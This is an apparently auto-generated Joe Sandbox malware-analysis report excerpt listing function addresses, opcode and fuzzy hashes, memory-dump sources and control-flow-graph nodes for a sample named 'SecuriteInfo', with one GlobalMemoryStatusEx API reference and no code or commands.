                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 82f8681790b1f07731acd8c4b66bec2e6a01ba7caecd9eb8ef56d4d9be758bc7
                                    • Instruction ID: 0edb9ff8f944021115dc208adbd24f8d32f53c7c1df0f31126234fdbdfed0e8d
                                    • Opcode Fuzzy Hash: 82f8681790b1f07731acd8c4b66bec2e6a01ba7caecd9eb8ef56d4d9be758bc7
                                    • Instruction Fuzzy Hash: D2014B74A00659DFCB54DFA9D8447EE7BF5BF48202F00842AE816D2281DB348A51DFA1
                                    Function 085CDCC0 Relevance: .0, Instructions: 33COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a79913a38eabf5403194e75b1ce21272d25e49f7fd3e8996b5d5b904e98134cd
                                    • Instruction ID: 80cd635962883475f98ab1b4b2288b1f6ba86089bfa3aeb897f9aa09f1e560ce
                                    • Opcode Fuzzy Hash: a79913a38eabf5403194e75b1ce21272d25e49f7fd3e8996b5d5b904e98134cd
                                    • Instruction Fuzzy Hash: 24F0BE32A08245AFCF05CFA8E840D99BFBAFF45212B19C1EFE008D7221E6309D10CB50
                                    Function 085C1363 Relevance: .0, Instructions: 33COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4552ae50a36d542361cafc0bb7274772d63d2766f44a3e57f3c2baeb9142d91
                                    • Instruction ID: e78cecdab05d54bb4593152fe2811e1fb874824472e7b56f30bd179eaaa8c2c2
                                    • Opcode Fuzzy Hash: a4552ae50a36d542361cafc0bb7274772d63d2766f44a3e57f3c2baeb9142d91
                                    • Instruction Fuzzy Hash: 6AF04F719102599FCB50DFF998057EE7FF8BB48242F04482AE859D2281E7348654DFD0
                                    Function 085CE978 Relevance: .0, Instructions: 31COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6a11158c9f9fb1a5b594d2e886cae76b9f2e196d4900cb3bcc4fcc400ceac312
                                    • Instruction ID: acd19063d440c4ccf8c1b7c371bb903a300115adc72aa113ebf58a6dbcee0888
                                    • Opcode Fuzzy Hash: 6a11158c9f9fb1a5b594d2e886cae76b9f2e196d4900cb3bcc4fcc400ceac312
                                    • Instruction Fuzzy Hash: 24F0E7B4D1824A9FEB44DFA9C4867AEBFF5BB08300F1489ADD515E7201D7748540CF90
                                    Function 085CE988 Relevance: .0, Instructions: 29COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 811e2e082b8e04c8a167e367857b2157e5660361715d6a6893954156ba7b8d77
                                    • Instruction ID: 717d79fda356200c9e361a7003064244a667af848fbd8ee6888552c41a7309b3
                                    • Opcode Fuzzy Hash: 811e2e082b8e04c8a167e367857b2157e5660361715d6a6893954156ba7b8d77
                                    • Instruction Fuzzy Hash: D3F0DAB4D0424A9FDB84DFE9C846AAEBBF5FB48300F1149A9D919E7200D77495408F91
                                    Function 085C7F38 Relevance: .0, Instructions: 27COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f2821952f12326288e00833d488689a6ac016655e5b1e181d93a718408c4490a
                                    • Instruction ID: 5dcace29f0f372c9c991f2d782a04294049e13abd3818cec7f91056e0a690030
                                    • Opcode Fuzzy Hash: f2821952f12326288e00833d488689a6ac016655e5b1e181d93a718408c4490a
                                    • Instruction Fuzzy Hash: 13E0683038434427E7422BA4780FB793FD69B8DE50F208025FE82EA3D6DF285C059386
                                    Function 085CE848 Relevance: .0, Instructions: 23COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 76607af6dc3f07ba85357488eb4be5d089efb289e8ce0a6785773b86390412b9
                                    • Instruction ID: 71116615b88e20284e42d584ff32da283bc421b64c4aa9612507d4fea7acacb7
                                    • Opcode Fuzzy Hash: 76607af6dc3f07ba85357488eb4be5d089efb289e8ce0a6785773b86390412b9
                                    • Instruction Fuzzy Hash: 87F0A076844142DEC720CFA9C08674ABFF0BB05325F28869CC0649B292CB389146CF80
                                    Function 085C7F48 Relevance: .0, Instructions: 22COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6b5cc229ab3afb805133921208cc3b92489d33d548b197e86de22b6e4a15ee6a
                                    • Instruction ID: 40dcecdf3a51c2bb387456aa6861f79e8e6c6ae78b2f2313417b2c2a6586af62
                                    • Opcode Fuzzy Hash: 6b5cc229ab3afb805133921208cc3b92489d33d548b197e86de22b6e4a15ee6a
                                    • Instruction Fuzzy Hash: E4E086353842145BD6441AA4681F9693B95978CF10B208425FF46DA3D4DE645C458786
                                    Function 085CE858 Relevance: .0, Instructions: 18COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a24c3459c639dbda71ee3209d95963e028e18ec48c5b5a0b51c5471258e41ea2
                                    • Instruction ID: b602da209a801441bb3c07a2b936760603a5bec8b683635eee52c7481ce93ab0
                                    • Opcode Fuzzy Hash: a24c3459c639dbda71ee3209d95963e028e18ec48c5b5a0b51c5471258e41ea2
                                    • Instruction Fuzzy Hash: 7CE092B4D4020ADFD740EFAAC905A5EBBF0BB08601F5189A9D419E7221E77496058F91
                                    Function 085CABEE Relevance: .0, Instructions: 18COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4501897e3b87f64d48cfc6161457e9b59b970965887f87b0a2e8fb12511c299a
                                    • Instruction ID: 228d53b6ee5e13d17cc0b5b3d0d6c9e9a8464a7738ce181f217bf27e13699d99
                                    • Opcode Fuzzy Hash: 4501897e3b87f64d48cfc6161457e9b59b970965887f87b0a2e8fb12511c299a
                                    • Instruction Fuzzy Hash: 85D05EB5A5402C8FC7059AE4E4484ECBF30FB89213B00482AD513E3104D7301810CE54
                                    Function 085C8930 Relevance: .0, Instructions: 17COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 72816856548808af68e5c68a482499d4950bb0dfae67acbdfc97fcd745bd7a17
                                    • Instruction ID: 0991e5ae3622e1543928a6b911c935237e20c82e537f048fe9d416502cc98c70
                                    • Opcode Fuzzy Hash: 72816856548808af68e5c68a482499d4950bb0dfae67acbdfc97fcd745bd7a17
                                    • Instruction Fuzzy Hash: 96D0C7703C4305FFE5A40A91DC16F31769DF784F51F10447DFA496A6D0CAB66841CA57
                                    Function 085C30F8 Relevance: .0, Instructions: 17COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 15babb26001fba8c177fea0b0a6d1f37fcdc2f4a8aed0a8308686d3cff6d6dd9
                                    • Instruction ID: b2708dcb90c4b77d0e5903ed8652c80d68edee32cd7399bd140456400f705c50
                                    • Opcode Fuzzy Hash: 15babb26001fba8c177fea0b0a6d1f37fcdc2f4a8aed0a8308686d3cff6d6dd9
                                    • Instruction Fuzzy Hash: 64D0123011534DAFDB118BB1A90C7597FD47B00295F04C02EED0585292DB31C015AB14
                                    Function 085C3108 Relevance: .0, Instructions: 13COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d15d9a67fa8264e63e7b62f5c9801e5506f47f3ddf397b78d704c8bf8381a2d6
                                    • Instruction ID: ea1802a3178912fbbc9bccb7011eb1e4443ac5607fee7e013566de610bcd6dae
                                    • Opcode Fuzzy Hash: d15d9a67fa8264e63e7b62f5c9801e5506f47f3ddf397b78d704c8bf8381a2d6
                                    • Instruction Fuzzy Hash: B3D0C93061020DAFDB109AB1E80CA697ED9AB00396F00C43EE90582291DA72D4519A54
                                    Function 085CC229 Relevance: .0, Instructions: 12COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f2f31a906504ac389022f56bbb30b57a3e87714c4c77f561fdb523b7293dc998
                                    • Instruction ID: ba49d2e90e9ec8f9890cef3b84be06a2eed1aa1058accf89c3321fb7f95af305
                                    • Opcode Fuzzy Hash: f2f31a906504ac389022f56bbb30b57a3e87714c4c77f561fdb523b7293dc998
                                    • Instruction Fuzzy Hash: 7DD0C93E00A2C09FC702AF64A8959417F71BF6620030A40C6D0908A063C529446CCB62
                                    Function 085C7672 Relevance: .0, Instructions: 10COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 13d9e3b5c85f11e7cdfe27f22eb6a42681d7ef1ae6ce39e1ad4d05287a8100a9
                                    • Instruction ID: 9da4b121dfdf800dabf51b969d0ebd1d0eb3773731209f5b484b9f64c8e4832f
                                    • Opcode Fuzzy Hash: 13d9e3b5c85f11e7cdfe27f22eb6a42681d7ef1ae6ce39e1ad4d05287a8100a9
                                    • Instruction Fuzzy Hash: 42C04C3D0440059E8605AB98C594C9ABEA9FF99301785DD56E3848B130CB25C81CDF49
                                    Function 085CAF90 Relevance: .0, Instructions: 9COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79e38186d60692f6e9dcbbb60412b62bafd7e28d5e8f8809c50955849ef2d3ab
                                    • Instruction ID: 1da8cd33ffe51e3cabf1de0f485af37cd150db5b97c5ef338b42e364424506bf
                                    • Opcode Fuzzy Hash: 79e38186d60692f6e9dcbbb60412b62bafd7e28d5e8f8809c50955849ef2d3ab
                                    • Instruction Fuzzy Hash: 90D0CAB4E08208CFCB01CF80C0486EEBBB1BB08302F208418D01AA3240CB766D02CF40
                                    Function 085CC4E4 Relevance: .0, Instructions: 8COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0046a621aaf117129cb1f3b0f2e717c6353c95845309d7a5d7e06bbf019e97d3
                                    • Instruction ID: 867b498240e6d47df60f15f3f8f67d93fde4a17a57ce6385ba9d7723a83adee2
                                    • Opcode Fuzzy Hash: 0046a621aaf117129cb1f3b0f2e717c6353c95845309d7a5d7e06bbf019e97d3
                                    • Instruction Fuzzy Hash: 3FB0922A5A8101AA900172A48A8092AA860BFB5703B808C2AA309C001084A498699F1B

                                    Non-executed Functions

                                    Function 05580040 Relevance: .3, Instructions: 315COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2060061163.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5580000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 60c27a4e2ea3502d494dd0a692767d68f4d767558422acf5848eeb7b571b522b
                                    • Instruction ID: 5f03fd9d6d5cf52c9f9a2bfe19dcba6a7ea803ce694b81d53e690a835dcb99a3
                                    • Opcode Fuzzy Hash: 60c27a4e2ea3502d494dd0a692767d68f4d767558422acf5848eeb7b571b522b
                                    • Instruction Fuzzy Hash: 2C1292B24017468BE730CF65E84C1897BB9BB81B28F914309D2616F2E9DBB8354BCF44
                                    Function 085CD2C1 Relevance: .3, Instructions: 273COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9a205153de327f9db62f06cf628f2162cc7bda002ee7bd40847fcaadca25d2a2
                                    • Instruction ID: adc87a2eda8c2c5ba71828d5819235bc796b1c6920f2c9e5a490c43eb878a385
                                    • Opcode Fuzzy Hash: 9a205153de327f9db62f06cf628f2162cc7bda002ee7bd40847fcaadca25d2a2
                                    • Instruction Fuzzy Hash: 8FD12931C2075A8ACB15EF68D990BD9B7B5FF95300F5087AAD04937220EB746AC9CB51
                                    Function 085CD2D0 Relevance: .3, Instructions: 264COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 63779d13f062e87f7c77ba9deee413bd09fa783ef3cc695fdca13224b47fb19a
                                    • Instruction ID: c6c2107d49d5788613bbfcb8209dea62364fbba5deac63e0dceeba2fd243a38b
                                    • Opcode Fuzzy Hash: 63779d13f062e87f7c77ba9deee413bd09fa783ef3cc695fdca13224b47fb19a
                                    • Instruction Fuzzy Hash: 5ED10931C2071A8ACB15EF68D994BDDB7B5FF95300F5087AAD04937220EB746AC9CB51
                                    Function 0133E02C Relevance: .3, Instructions: 264COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fe549a814a6d7f64d032ddb3720adaa2c9884dfc04f2aba24a240a271f189798
                                    • Instruction ID: 4e029b538816ea0339ccdd99cc202b76c5abeaa6df54fdbc83bba5cfd330c03a
                                    • Opcode Fuzzy Hash: fe549a814a6d7f64d032ddb3720adaa2c9884dfc04f2aba24a240a271f189798
                                    • Instruction Fuzzy Hash: 9FA17D32E0021A8FCF19DFB9C88059EBBB6FFC4304B15457AE905AB265DB31D915CB51
                                    Function 05580006 Relevance: .2, Instructions: 241COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2060061163.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5580000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 85392441721fec9aa240825ffa4a4dc8ab5fdba1c13e5740f5136e3a6fde24be
                                    • Instruction ID: 0cba040c9c3cbada355cab82fff1db804f1c9970b23f30140b5ec048e37971f7
                                    • Opcode Fuzzy Hash: 85392441721fec9aa240825ffa4a4dc8ab5fdba1c13e5740f5136e3a6fde24be
                                    • Instruction Fuzzy Hash: 44D139B28017458FDB21CF64E8481897BB9FB81B28F554319D1616F2E9DBB8348BCF44
                                    Function 07F50660 Relevance: .1, Instructions: 58COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2062277673.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07ED0000, based on PE: true
                                    • Associated: 00000000.00000002.2062036493.0000000007ED0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ed0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8473ab3f9e5ba4a0df581f6d35f5e38c3af34888a71f136f503b9f1bf45b7224
                                    • Instruction ID: ff2764097cb52492539b3647a15baaffa93295e866e42b6646069ba1633c5f9b
                                    • Opcode Fuzzy Hash: 8473ab3f9e5ba4a0df581f6d35f5e38c3af34888a71f136f503b9f1bf45b7224
                                    • Instruction Fuzzy Hash: B721B8B5E156189FEB18CF6BC84069EFAF7AFC9300F14C0B9C90966254EB3409458F51

                                    Execution Graph

                                    Execution Coverage:11.5%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:17
                                    Total number of Limit Nodes:4
                                    execution_graph 25531 1870848 25533 187084e 25531->25533 25532 187091b 25533->25532 25535 1871342 25533->25535 25536 1871356 25535->25536 25537 1871448 25536->25537 25539 1877059 25536->25539 25537->25533 25540 1877063 25539->25540 25541 1877119 25540->25541 25544 672d2b8 25540->25544 25548 672d2a8 25540->25548 25541->25536 25545 672d2cd 25544->25545 25546 672d4e2 25545->25546 25547 672d4fb GlobalMemoryStatusEx 25545->25547 25546->25541 25547->25545 25549 672d2b8 25548->25549 25550 672d4e2 25549->25550 25551 672d4fb GlobalMemoryStatusEx 25549->25551 25550->25541 25551->25549

                                    Executed Functions

                                    Function 01879BC0 Relevance: 2.8, Instructions: 2820COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5661c2e1b8202bffacd438543bf875009be1bbf1f118e51e0d931e5c99e86065
                                    • Instruction ID: 71d9cf221625dfbe46e257aa27158fb299441bbf40b7504040cbc4d904d6aa96
                                    • Opcode Fuzzy Hash: 5661c2e1b8202bffacd438543bf875009be1bbf1f118e51e0d931e5c99e86065
                                    • Instruction Fuzzy Hash: 9253F731D10B1A8ACB51EF68C8905A9F7B1FF99300F15D79AE458B7121FB70AAD4CB81
                                    Function 0187CE50 Relevance: 2.3, Instructions: 2329COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4e8fd5349de0303cb012483bf35b3f3ee049825373973d1d5a7be1ff20859ad0
                                    • Instruction ID: defa4c4637df362771a0a691fdfa026c0ddb4e1fc5c4af16dff873ba5e3f7edf
                                    • Opcode Fuzzy Hash: 4e8fd5349de0303cb012483bf35b3f3ee049825373973d1d5a7be1ff20859ad0
                                    • Instruction Fuzzy Hash: 88332E31D1061A8ECB11EF68C8946ADF7B1FF99300F15C79AE458A7221EB70EAD5CB41
                                    Function 01874A60 Relevance: .3, Instructions: 266COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f6f9772d51d35674bb219a560f6adf320d5a23bed75360d94bcbc60d38b76706
                                    • Instruction ID: 24577af27dcbc5c41ebbd0f92797aa6040cd1d8a2112399f424907f053e1d13e
                                    • Opcode Fuzzy Hash: f6f9772d51d35674bb219a560f6adf320d5a23bed75360d94bcbc60d38b76706
                                    • Instruction Fuzzy Hash: 07B14970E00209CFDB14CFA9D9917AEBFF2AF88314F148529D819E7294EB74D985CB81
                                    Function 01873E48 Relevance: .2, Instructions: 238COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6c2bc0057f9d7388664606541ef5c3bada1dfcbb9f25c956f90bed3ae3950782
                                    • Instruction ID: 0863b75269eb88f244db5d0a25e6403731089a91acd57b9d34dc7a9faa126d02
                                    • Opcode Fuzzy Hash: 6c2bc0057f9d7388664606541ef5c3bada1dfcbb9f25c956f90bed3ae3950782
                                    • Instruction Fuzzy Hash: D3915A70E002099FDF10DFA9C98579DBBF2BF88304F148529E815E7294EB74DA85CB92
                                    Function 01876E9F Relevance: 2.6, Strings: 2, Instructions: 150COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2145 1876e9f-1876f0a call 1876c08 2154 1876f26-1876f55 2145->2154 2155 1876f0c-1876f25 call 187634c 2145->2155 2161 1876f57-1876f5a 2154->2161 2162 1876f6e-1876f71 2161->2162 2163 1876f5c-1876f63 2161->2163 2166 1876f73-1876fa8 2162->2166 2167 1876fad-1876fb0 2162->2167 2164 1876f69 2163->2164 2165 1877168-187716f 2163->2165 2164->2162 2166->2167 2168 1876fe3-1876fe6 2167->2168 2169 1876fb2-1876fc6 2167->2169 2170 1876ff6-1876ff8 2168->2170 2171 1876fe8 call 1877988 2168->2171 2176 1876fcc 2169->2176 2177 1876fc8-1876fca 2169->2177 2173 1876fff-1877002 2170->2173 2174 1876ffa 2170->2174 2178 1876fee-1876ff1 2171->2178 2173->2161 2175 1877008-1877017 2173->2175 2174->2173 2181 1877041-1877056 2175->2181 2182 1877019-187701c 2175->2182 2179 1876fcf-1876fde 2176->2179 2177->2179 2178->2170 2179->2168 2181->2165 2185 1877024-187703f 2182->2185 2185->2181 2185->2182
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q$LR]q
                                    • API String ID: 0-3917262905
                                    • Opcode ID: 888578683d0f8439e4fdfcae0e327db9bdd560a6312f3e19ed4bb820dd8ba67a
                                    • Instruction ID: 97cf646ba38aa566155316e525f1900d8793603c4efee5d7bff888f558c29da1
                                    • Opcode Fuzzy Hash: 888578683d0f8439e4fdfcae0e327db9bdd560a6312f3e19ed4bb820dd8ba67a
                                    • Instruction Fuzzy Hash: 6D51F430A016099FEB15DF79C41479EBBB6FF86700F20842AE405EB341EB75D946CB51
                                    Function 0672E0B8 Relevance: 1.6, APIs: 1, Instructions: 150COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2851 672e0b8-672e0ba 2852 672e0c2 2851->2852 2853 672e0bc-672e0c1 2851->2853 2854 672e0c3-672e0c9 2852->2854 2855 672e0ca-672e0d3 2852->2855 2853->2852 2854->2855 2856 672e0d5-672e0fc call 672ce44 2855->2856 2857 672e0fd-672e110 2855->2857 2861 672e113-672e11c call 672ce50 2857->2861 2864 672e122-672e160 2861->2864 2865 672e11e-672e121 2861->2865 2864->2861 2870 672e162 2864->2870 2871 672e164-672e169 2870->2871 2872 672e16a-672e181 2870->2872 2871->2872 2875 672e183-672e186 2872->2875 2876 672e187-672e214 GlobalMemoryStatusEx 2872->2876 2879 672e216-672e21c 2876->2879 2880 672e21d-672e245 2876->2880 2879->2880
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3289475619.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6720000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a31b05dbbc602ea6cd55ec2eb767dacb0ffd679c5e24c6d910c16d84f0999359
                                    • Instruction ID: 540d558cb1ddd48b14735dc76ac6e00ac42a2e59132f7f1cb7c6f587e8749060
                                    • Opcode Fuzzy Hash: a31b05dbbc602ea6cd55ec2eb767dacb0ffd679c5e24c6d910c16d84f0999359
                                    • Instruction Fuzzy Hash: A9414471D003669FCB10CFB9D8046EEBFF5AF9A320F1485AAD404A7241DB389881CBE0
                                    Function 0672E1A0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2883 672e1a0-672e1de 2884 672e1e6-672e214 GlobalMemoryStatusEx 2883->2884 2885 672e216-672e21c 2884->2885 2886 672e21d-672e245 2884->2886 2885->2886
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE ref: 0672E207
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3289475619.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6720000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID:
                                    • API String ID: 1890195054-0
